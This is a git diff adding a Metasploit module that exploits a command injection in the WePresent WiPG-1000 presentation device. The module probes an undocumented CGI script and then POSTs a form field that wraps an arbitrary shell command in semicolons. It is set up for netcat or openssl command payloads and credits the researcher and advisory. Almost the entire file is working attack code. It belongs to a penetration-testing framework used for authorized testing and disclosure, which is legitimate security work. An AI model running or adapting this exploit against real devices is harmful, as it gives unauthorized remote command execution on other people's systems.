diff --git a/modules/exploits/linux/http/wipg1000_cmd_injection.rb b/modules/exploits/linux/http/wipg1000_cmd_injection.rb new file mode 100644 index 0000000000..371c021377 --- /dev/null +++ b/modules/exploits/linux/http/wipg1000_cmd_injection.rb @@ -0,0 +1,78 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'WePresent WiPG-1000 Command Injection', + 'Description' => %q{ + This module exploits a command injection vulnerability in an undcoumented + CGI file in several versions of the WePresent WiPG-1000 devices. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matthias Brun', # Vulnerability Discovery, Metasploit Module + ], + 'References' => + [ + [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ] + ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic netcat openssl' + } + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['WiPG-1000 <=2.0.0.7', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 20 2017', + 'DefaultTarget' => 0)) + end + + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/cgi-bin/rdfs.cgi') + }) + if res and res.body =~ /Follow administrator instructions to enter the complete path/ then + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + def exploit + print_status('Sending request') + execute_cmd(payload.encoded) + end + + def execute_cmd(cmd) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri('/cgi-bin/rdfs.cgi'), + 'vars_post' => { + 'Client' => ";#{cmd};", + 'Download' => 'Download' + } + ) + + return res + end +end